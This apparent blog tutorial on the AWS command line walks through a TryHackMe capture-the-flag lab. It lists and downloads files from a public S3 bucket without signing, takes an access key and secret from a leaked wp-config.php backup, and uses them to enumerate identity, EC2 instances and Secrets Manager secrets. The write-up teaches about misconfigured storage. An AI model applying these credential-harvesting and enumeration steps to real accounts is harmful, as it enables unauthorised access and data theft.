AWS: Getting started with Amazon Web Services Command Line Interface (CLI) Part II
AWS CLI Part I show us how simple it is to install the CLI interface on Windows (CMD & Powershell) and Linux 64-bit. As we dive into more of using AWS CLI, let’s start learning basic commands.
Amazon S3
Amazon Simple Storage Service (Amazon S3) is an object storage service offering industry-leading scalability, data availability, security, and performance as per Amazon's definition. S3 is the object storage built to store and retrieve data anywhere (applications, on-premises, or cloud), and this is called ‘Bucket’.
You create a bucket, specify an AWS region (datacenters), set up your access controls as to which is public and privately accessible, and publish your data.
Here’s the S3 workflow so we can paint a better picture of their process.
Setting up S3 access controls is where it gets tricky and can lead to exposure of sensitive company data. The following example below is merely for educational purposes only. The information that I used is from the Tryhackme Advent of Cyber 3, which highlights the importance of securing data in S3.
Discovering Bucket Names
The image that was given to us in THM’s Cloud Elf Leaks challenge is
So by just looking at the URL, we have “https://s3.amazonaws.com/images.bestfestivalcompany.com/flyer.png” and our S3 Bucket name is “images.bestfestivalcompany.com”.
Further enumerating from this bucket.
With our AWS CLI installed, we want to check if we can enumerate/list any additional files from this bucket. The command that I used to list additional files within this bucket is:
“aws s3 ls s3://images.bestfestivalcompany.com — no-sign-request”
To get additional help on running s3 commands, simply type in ‘aws s3 help’
PS C:\Users\rcaparros\.aws> aws s3 helps3
^^Description
***********This section explains prominent concepts and notations in the set of
high-level S3 commands provided.......
Downloading Files
Within the list of files we found in our bucket, let’s download the ‘flag.txt’
PS C:\Users\rcaparros\.aws> aws s3 cp s3://images.bestfestivalcompany.com/flag.txt . --no-sign-request
download: s3://images.bestfestivalcompany.com/flag.txt to .\flag.txtNotice the use of “.” after the file name flag.txt, this is simply having the same file name to your destination folder.
Reading the content of our flag.txt file.
PS C:\Users\rcaparros\.aws> Get-Content .\flag.txt
It's easy to get your elves data when you leave it so easy to find!AWS Identity and Access Management
We briefly discussed access control earlier, AWS definition of Identity and Access Management (IAM) states that it is a web service that helps you securely control access to AWS resources. You use IAM to control who is authenticated (signed in) and authorized (has permissions) to use resources.
Reconnaissance in IAM
The key in exploiting IAM is finding credentials, just because we have access to a bucket that is publicly accessible this does not indicate that we have all the access we need.
Based on the same example that we are working with, we did notice that we have a backup file named ‘wp-backup.zip’. Let’s explore that file.
Download ‘wp-backup-zip’ and extract
PS C:\Users\rcaparros\Documents\thm\Adventofcyber3> aws s3 cp s3://images.bestfestivalcompany.com/wp-backup.zip . --no-sign-request
download: s3://images.bestfestivalcompany.com/wp-backup.zip to .\wp-backup.zipUnzip wp-backup.zipPS C:\Users\rcaparros\Documents\thm\Adventofcyber3> Expand-Archive -LiteralPath .\wp-backup.zip -DestinationPath .\wp-backup\
Exploring wp-backup
There are quite a few files to cover within this backup folder, so we’ll skip to the file that has the information we need — wp-config.php
PS C:\Users\rcaparros\Documents\thm\Adventofcyber3\wp-backup\wp_backup> Get-Content .\wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress******/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', 'images.bestfestivalcompany.com');
define('S3_UPLOADS_KEY', 'AKIAQI52OJVCPZXFYAOI');
define('S3_UPLOADS_SECRET', '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');
define('S3_UPLOADS_REGION', 'us-east-1');
Based on the information we have above (bolded), we have AWS Access Key ID of AKIAQI52OJVCPZXFYAOI and S3 Region of us-east-1.
If we need to find more information regarding the data that we have currently, we have to create a profile. A named profile is a collection of settings and credentials that you can apply to an AWS CLI command that can possibly lead us to get additional information. Such as, but not limited to:
- Security Token Service (STS)
- Get-caller-identity
- Listing all the EC2 instances running in an account
Building Profile
To build a profile, simply run ‘aws configure — profile PROFILENAME’. Based on our example, we’ll create a profile called “hr”. Fill in the information that is needed and follow the settings below.
Now that we have our ‘hr’ profile built, let’s run additional commands and if we can dig up more information.
- Finding the Account ID belonging to an access key
aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile hr
{
"Account": "019181489476"
}- Determining the Username the access key you’re using belongs to
aws sts get-caller-identity --profile hr
{
"UserId": "AIDAQI52OJVCFHT3E73BO",
"Account": "019181489476",
"Arn": "arn:aws:iam::019181489476:user/ElfMcHR@bfc.com"
}- Listing all the EC2 instances running in an account
aws ec2 describe-instances --output text --profile hr
RESERVATIONS 019181489476 043234062703 r-0e89ba65b28a7c699
INSTANCES 0 x86_64 HR-Po-Insta-1NAKAMW2PPVMT False True xen ami-0c2b8ca1dad447f8a i-0c56041ac61cf5a95 t3a.micro hr-key 2021-11-13T12:36:58+00:00 Linux/UNIX ip-172-31-68-81.ec2.internal 172.31.68.81 /dev/xvda ebs True User initiated (2021-11-13 12:42:39 GMT) subnet-00b1107c0c18c0722 RunInstances 2021-11-13T12:36:58+00:00 hvm vpc-0235b5a9591606b73
BLOCKDEVICEMAPPINGS /dev/xvda
EBS 2021-11-13T12:36:59+00:00 True attached vol-0ac79339aac8b249d
CAPACITYRESERVATIONSPECIFICATION open
CPUOPTIONS 1 2
ENCLAVEOPTIONS False
HIBERNATIONOPTIONS False
METADATAOPTIONS enabled disabled 1 optional applied
MONITORING disabled
NETWORKINTERFACES interface 16:35:78:d8:60:d1 eni-027945da0ddb79e59 019181489476 ip-172-31-68-81.ec2.internal 172.31.68.81 True in-use subnet-00b1107c0c18c0722 vpc-0235b5a9591606b73
ATTACHMENT 2021-11-13T12:36:58+00:00 eni-attach-0d91e2137f6014220 True 0 0 attached
GROUPS sg-0c6e7cd87c1c8d035 default
PRIVATEIPADDRESSES True ip-172-31-68-81.ec2.internal 172.31.68.81
PLACEMENT us-east-1f default
PRIVATEDNSNAMEOPTIONS False False ip-name
SECURITYGROUPS sg-0c6e7cd87c1c8d035 default
STATE 80 stopped
STATEREASON Client.UserInitiatedShutdown Client.UserInitiatedShutdown: User initiated shutdown
TAGS aws:cloudformation:stack-id arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS aws:cloudformation:logical-id Instance
TAGS created_by Elf McHR
TAGS aws:cloudformation:stack-name HR-Portal
TAGS Name HR-Portal- Listing all the EC2 instances running in an account in a different region
aws ec2 describe-instances --output text --region us-east-1 --profile hrRESERVATIONS 019181489476 043234062703 r-0e89ba65b28a7c699
INSTANCES 0 x86_64 HR-Po-Insta-1NAKAMW2PPVMT False True xen ami-0c2b8ca1dad447f8a i-0c56041ac61cf5a95 t3a.micro hr-key 2021-11-13T12:36:58+00:00 Linux/UNIX ip-172-31-68-81.ec2.internal 172.31.68.81 /dev/xvda ebs True User initiated (2021-11-13 12:42:39 GMT) subnet-00b1107c0c18c0722 RunInstances 2021-11-13T12:36:58+00:00 hvm vpc-0235b5a9591606b73
BLOCKDEVICEMAPPINGS /dev/xvda
EBS 2021-11-13T12:36:59+00:00 True attached vol-0ac79339aac8b249d
CAPACITYRESERVATIONSPECIFICATION open
CPUOPTIONS 1 2
ENCLAVEOPTIONS False
HIBERNATIONOPTIONS False
METADATAOPTIONS enabled disabled 1 optional applied
MONITORING disabled
NETWORKINTERFACES interface 16:35:78:d8:60:d1 eni-027945da0ddb79e59 019181489476 ip-172-31-68-81.ec2.internal 172.31.68.81 True in-use subnet-00b1107c0c18c0722 vpc-0235b5a9591606b73
ATTACHMENT 2021-11-13T12:36:58+00:00 eni-attach-0d91e2137f6014220 True 0 0 attached
GROUPS sg-0c6e7cd87c1c8d035 default
PRIVATEIPADDRESSES True ip-172-31-68-81.ec2.internal 172.31.68.81
PLACEMENT us-east-1f default
PRIVATEDNSNAMEOPTIONS False False ip-name
SECURITYGROUPS sg-0c6e7cd87c1c8d035 default
STATE 80 stopped
STATEREASON Client.UserInitiatedShutdown Client.UserInitiatedShutdown: User initiated shutdown
TAGS aws:cloudformation:stack-id arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS aws:cloudformation:logical-id Instance
TAGS created_by Elf McHR
TAGS aws:cloudformation:stack-name HR-Portal
TAGS Name HR-Portal
Secrets Manager
Amazon Web Services Secrets Manager provides a service to enable you
to store, manage, and retrieve secrets.
aws secretsmanager list-secrets --profile hr
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
"Name": "HR-Password",
"Description": "Portal DB Secret",
"LastChangedDate": "2021-11-23T20:29:07.812000-05:00",
"LastAccessedDate": "2021-12-25T19:00:00-05:00",
"Tags": [
{
"Key": "aws:cloudformation:stack-name",
"Value": "HR-Portal"
},
{
"Key": "aws:cloudformation:logical-id",
"Value": "FalseSecret"
},
{
"Key": "aws:cloudformation:stack-id",
"Value": "arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7"
},
{
"Key": "created_by",
"Value": "Elf McHR"
},
{
"Key": "Name",
"Value": "Payroll"
}
],
"SecretVersionsToStages": {
"70630b3c-4fbe-4a24-885d-18445bd808b1": [
"AWSCURRENT"
],
"a702190e-69f7-4a8a-81fd-3d20b486657a": [
"AWSPREVIOUS"
]
},
"CreatedDate": "2021-11-13T07:36:56.521000-05:00"
}
]
}- Specify a region
aws secretsmanager get-secret-value --secret-id HR-Password --profile hr --region us-east-1
{
"ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
"Name": "HR-Password",
"VersionId": "70630b3c-4fbe-4a24-885d-18445bd808b1",
"SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2021-11-23T20:29:07.718000-05:00"
}Conclusion
This concludes our lessons for exploring Amazon’s CLI. This is only one of the many features that the CLI can offer.
References:
